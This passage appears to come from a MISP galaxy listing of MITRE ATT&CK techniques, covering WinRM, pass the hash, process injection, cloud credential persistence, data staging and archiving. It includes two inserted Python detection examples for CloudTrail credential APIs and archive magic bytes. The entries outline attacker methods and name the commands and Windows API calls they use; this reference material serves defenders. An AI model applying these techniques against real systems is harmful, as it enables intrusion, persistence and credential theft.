WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006"

Table 5654. Table References

Links

http://msdn.microsoft.com/en-us/library/aa384426

https://attack.mitre.org/techniques/T1021/006

https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

File Transfer Protocols - T1071.002

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002"

Table 5655. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/002

Uninstall Malicious Application - T1630.001

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

  • Abusing device owner permissions to perform silent uninstallation using device owner API calls.

  • Abusing root permissions to delete files from the filesystem.

  • Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1630.001"

Table 5656. Table References

Links

https://attack.mitre.org/techniques/T1630/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html

Invalid Code Signature - T1036.001

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)

Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.

The tag is: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"

Table 5657. Table References

Links

https://attack.mitre.org/techniques/T1036/001

https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/

Local Data Staging - T1074.001

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"

Table 5658. Table References

Links

https://attack.mitre.org/techniques/T1074/001

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Application Access Token - T1550.001

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)

OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services to which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)

Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the sts:GetFederationToken API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001"

Table 5659. Table References

Links

https://attack.mitre.org/techniques/T1550/001

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials

https://cloud.google.com/iam/docs/service-account-monitoring

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

SQL Stored Procedures - T1505.001

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)

The tag is: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001"

Table 5660. Table References

Links

https://attack.mitre.org/techniques/T1505/001

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/

https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017

https://securelist.com/malicious-tasks-in-ms-sql-server/92167/

Archive via Utility - T1560.001

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.

On Windows, <code>diantz</code> or <code>makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.

Adversaries may also use third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001"

Table 5661. Table References

Links

https://attack.mitre.org/techniques/T1560/001

https://en.wikipedia.org/wiki/List_of_file_signatures

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://www.7-zip.org/

https://www.rarlab.com/

https://www.winzip.com/win/en/

Additional Cloud Credentials - T1098.001

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)

Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application’s service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
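The API calls named above (CreateAccessKey, CreateKeyPair/ImportKeyPair and sts:GetFederationToken, the last of which the Application Access Token entry also discusses) all produce CloudTrail records, which is where a defender can catch credential addition. The Python below is an added editorial example and not part of the MISP galaxy or the ATT&CK data: it triages constructed CloudTrail-style records and treats an access key created for a principal other than the caller as the highest-priority case. The sample records, the severity ranking and the reason strings are assumptions of the example.

```python
import json

# Constructed CloudTrail-style records (not real logs). Field names follow the
# CloudTrail record format; principal names and values are made up for the demo.
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"userName": "dev-alice"}},          # self-rotation
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"userName": "admin-bob"}},          # key for another principal
    {"eventSource": "ec2.amazonaws.com", "eventName": "ImportKeyPair",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"keyName": "ops-key"}},
    {"eventSource": "sts.amazonaws.com", "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": {"name": "fed-session", "durationSeconds": 129600}},
    {"eventSource": "iam.amazonaws.com", "eventName": "ListUsers",
     "userIdentity": {"type": "IAMUser", "userName": "dev-alice"},
     "requestParameters": None},                                # benign noise
]

# API calls from the text that add or mint credentials. A user rotating their own
# key is routine in most environments, so that case is reported at a lower
# severity than a key created for a different principal (assumed ranking).
CREDENTIAL_APIS = {
    "CreateAccessKey": "long-lived IAM access key created",
    "CreateKeyPair": "EC2 SSH key pair generated",
    "ImportKeyPair": "caller-supplied SSH public key imported",
    "GetFederationToken": "federated session minted; outlives deactivation of the caller's keys",
}


def actor_of(event):
    """Best-effort principal name; IAM users carry userName, roles fall back to the ARN."""
    ident = event.get("userIdentity") or {}
    return ident.get("userName") or ident.get("arn") or "unknown"


def triage(events):
    """Return one finding per credential-adding API call, highest severity for cross-principal keys."""
    findings = []
    for ev in events:
        name = ev.get("eventName")
        if name not in CREDENTIAL_APIS:
            continue
        params = ev.get("requestParameters") or {}
        actor = actor_of(ev)
        # CreateAccessKey without userName targets the caller's own account.
        target = params.get("userName", actor)
        severity, reason = "medium", CREDENTIAL_APIS[name]
        if name == "CreateAccessKey" and target != actor:
            severity = "high"
            reason = f"access key created for a different principal ({target})"
        findings.append({"severity": severity, "eventName": name,
                         "actor": actor, "target": target, "reason": reason})
    return findings


def load_records(raw_json):
    """Parse a CloudTrail log file body of the form {"Records": [...]}."""
    return json.loads(raw_json)["Records"]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['eventName']:20} actor={f['actor']} "
              f"target={f['target']} :: {f['reason']}")
```

In production the same logic runs over records from a CloudTrail S3 delivery or an EventBridge rule; the point of the example is the cross-principal check, which is what turns CreateAccessKey from routine key rotation into a privilege-escalation signal.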

The tag is: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001"

Table 5662. Table References

Links

https://attack.mitre.org/techniques/T1098/001

https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add

https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/

https://expel.io/blog/finding-evil-in-aws/

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/

https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1

https://sysdig.com/blog/scarleteel-2-0/

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815

Impersonate SS7 Nodes - T1430.002

Adversaries may exploit the lack of authentication in signaling system network nodes to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)

By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)

The tag is: misp-galaxy:mitre-attack-pattern="Impersonate SS7 Nodes - T1430.002"

Table 5663. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1430/002

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html

https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.youtube.com/watch?v=q0n5ySqbfdI

Compile After Delivery - T1027.004

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004"

Table 5664. Table References

Links

https://attack.mitre.org/techniques/T1027/004

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

Remote Data Staging - T1074.002

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002"

Table 5665. Table References

Links

https://attack.mitre.org/techniques/T1074/002

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Portable Executable Injection - T1055.002

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002"

Table 5666. Table References

Links

https://attack.mitre.org/techniques/T1055/002

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Hash - T1550.002

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002"

Table 5667. Table References

Links

https://attack.mitre.org/techniques/T1550/002

https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/

Archive via Library - T1560.002

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
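Whether the archive is produced by a utility (the Archive via Utility entry above) or by a linked library, what lands on disk starts with the format's fixed leading bytes from the file-signature list both entries reference, and that is what a defender scanning a staging directory can key on. The Python below is an added example serving both entries; it is not code from the page or from MITRE. It writes constructed "collected data" in every format the standard library can produce, identifies each by magic bytes (including raw zlib streams, which have no ASCII signature), and flags archives whose extension disguises the format. The sample paths, data and the list of innocuous extensions are assumptions.

```python
import bz2
import gzip
import io
import lzma
import zipfile
import zlib

# Leading bytes per format, from the file-signature list the page references.
ARCHIVE_MAGIC = {
    b"PK\x03\x04": "zip",            # zip, WinZip, 7-Zip's .zip, Office OOXML
    b"\x1f\x8b": "gzip",
    b"BZh": "bzip2",
    b"\xfd7zXZ\x00": "xz",
    b"7z\xbc\xaf\x27\x1c": "7-zip",
    b"Rar!\x1a\x07": "rar",          # RAR 1.5-4.x; RAR5 appends 0x01 0x00
    b"MSCF": "cab",                  # makecab / diantz output
}


def identify_archive(blob: bytes):
    """Return the archive kind for a blob, or None. Matches on leading bytes only."""
    for magic, kind in ARCHIVE_MAGIC.items():
        if blob.startswith(magic):
            return kind
    # A raw zlib stream (what an implant linked against zlib typically emits) has
    # no ASCII magic: CMF 0x78 (deflate, 32K window) and CMF*256+FLG divisible by 31.
    if len(blob) >= 2 and blob[0] == 0x78 and int.from_bytes(blob[:2], "big") % 31 == 0:
        return "zlib"
    return None


# Constructed "collected data" standing in for harvested documents.
COLLECTED = b"host=ws-042\r\nuser=jdoe\r\nnotes=quarterly numbers, see attached\r\n" * 32


def archive_with_stdlib(data: bytes = COLLECTED) -> dict:
    """Archive-via-library: the same data in each format the standard library writes."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("loot.txt", data)
    return {"zip": zbuf.getvalue(), "gzip": gzip.compress(data),
            "bzip2": bz2.compress(data), "xz": lzma.compress(data),
            "zlib": zlib.compress(data)}


def find_staged_archives(files: dict) -> list:
    """Scan {path: bytes}; return (path, kind, disguised) for every archive found."""
    innocuous = (".log", ".txt", ".tmp", ".dat", ".bak")   # assumed disguise extensions
    hits = []
    for path, blob in files.items():
        kind = identify_archive(blob)
        if kind is None:
            continue
        hits.append((path, kind, path.lower().endswith(innocuous)))
    return hits


if __name__ == "__main__":
    staged = archive_with_stdlib()
    sample_dir = {r"C:\Users\Public\update.log": staged["zip"],
                  r"C:\Windows\Temp\cache.tmp": staged["zlib"],
                  r"C:\Users\jdoe\Documents\notes.txt": COLLECTED}
    for path, kind, disguised in find_staged_archives(sample_dir):
        print(f"{path}: {kind}{' (extension hides format)' if disguised else ''}")
```

Magic-byte matching does not help once the adversary encrypts the archive with a key and strips the container (the output is then indistinguishable from random bytes); in that case entropy of the file and the process that wrote it are the remaining signals.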

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002"

Table 5668. Table References

Links

https://attack.mitre.org/techniques/T1560/002

https://en.wikipedia.org/wiki/List_of_file_signatures

https://github.com/madler/zlib

https://libzip.org/

https://pypi.org/project/rarfile/

GUI Input Capture - T1056.002

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)

The tag is: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002"

Table 5669. Table References

Links

https://attack.mitre.org/techniques/T1056/002

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

https://logrhythm.com/blog/do-you-trust-your-computer/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Dynamic API Resolution - T1027.007

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.

API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)

To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.

Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic API Resolution - T1027.007"

Table 5670. Table References

Links

https://attack.mitre.org/techniques/T1027/007

https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03

https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware

Rename System Utilities - T1036.003

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing.(Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)

The tag is: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003"

Table 5671. Table References

Links

https://attack.mitre.org/techniques/T1036/003

https://lolbas-project.github.io/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

https://www.f-secure.com/documents/996508/1030745/CozyDuke

Network Logon Script - T1037.003

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003"

Table 5672. Table References

Links

https://attack.mitre.org/techniques/T1037/003

https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008

Thread Execution Hijacking - T1055.003

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread</code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)

This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003"

Table 5673. Table References

Links

https://attack.mitre.org/techniques/T1055/003

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Pass the Ticket - T1550.003

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When performing PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)

